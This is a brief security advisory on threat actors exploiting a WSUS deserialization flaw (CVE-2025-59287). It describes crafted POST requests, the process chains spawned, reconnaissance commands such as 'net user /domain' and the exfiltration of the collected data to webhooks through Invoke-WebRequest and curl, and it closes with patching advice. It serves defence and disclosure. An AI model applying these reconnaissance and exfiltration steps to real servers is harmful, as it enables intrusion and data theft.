Exploitation of WSUS RCE Vulnerability

A recent campaign was observed where threat actors actively exploited a Microsoft WSUS (Windows Server Update Services) vulnerability (CVE-2025-59287) across multiple organizations starting around October 23, 2025. The attackers targeted WSUS instances publicly exposed on their default ports 8530/TCP and 8531/TCP, exploiting a deserialization vulnerability via the AuthorizationCookie. The exploitation involved sending specially crafted POST requests to WSUS web services, which triggered remote code execution. During the attacks, malicious processes were spawned through HTTP worker processes and WSUS service binaries, creating process chains such as wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.

The attackers executed base64-encoded PowerShell payloads that performed reconnaissance activities on compromised servers, including enumerating network and user information through commands like "net user /domain" and "ipconfig /all". The collected data was then exfiltrated to remote webhook URLs using both PowerShell's Invoke-WebRequest and curl.exe. The threat actors employed proxy networks to conduct and obfuscate their exploitation activities. Microsoft released an out-of-band security update to address this vulnerability, and organizations are strongly advised to apply the patch immediately and restrict internet access to WSUS infrastructure by blocking inbound traffic to TCP ports 8530 and 8531 except for explicitly required sources.